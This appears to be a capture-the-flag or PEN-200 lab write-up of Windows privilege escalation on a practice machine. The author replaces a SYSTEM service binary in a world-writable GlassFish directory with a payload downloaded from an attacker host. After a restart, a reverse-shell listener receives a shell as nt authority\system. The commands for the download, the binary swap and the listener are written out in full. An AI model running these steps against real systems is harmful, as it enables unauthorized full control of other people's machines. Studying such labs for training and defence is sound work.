Binary Hijacking
The domain1 service that runs with privileges of SYSTEM executes a binary located in a directory that is writable by anyone.
Given that the C:\glassfish4\glassfish\domains\domain1\bin\ directory is writable by anyone, including the current user, arthur, I could simply replace the binary
PS C:\glassfish4\glassfish\domains\domain1\bin> whoami
fishyyy\arthur
PS C:\glassfish4\glassfish\domains\domain1\bin> mv C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exe \domain1Service.exe.bak
PS C:\glassfish4\glassfish\domains\domain1\bin> iwr -Uri http://192.168.45.249/domain1Service.exe -OutFile C:\glassfish4\glassfish\domains\domain1\bin\domain1Service.exeRenaming the original binary and delivering the payload
PS C:\Users\arthur> Restart-ComputerRestarting the target system to invoke the payload in the domain1 service
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ nnc 1235
listening on [any] 1235 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.219.168] 49668
Microsoft Windows [Version 10.0.19042.1288]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> whoami
whoami
nt authority\system
C:\WINDOWS\system32> hostname
hostname
Fishyyy
C:\WINDOWS\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.219.168
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.219.254System level compromise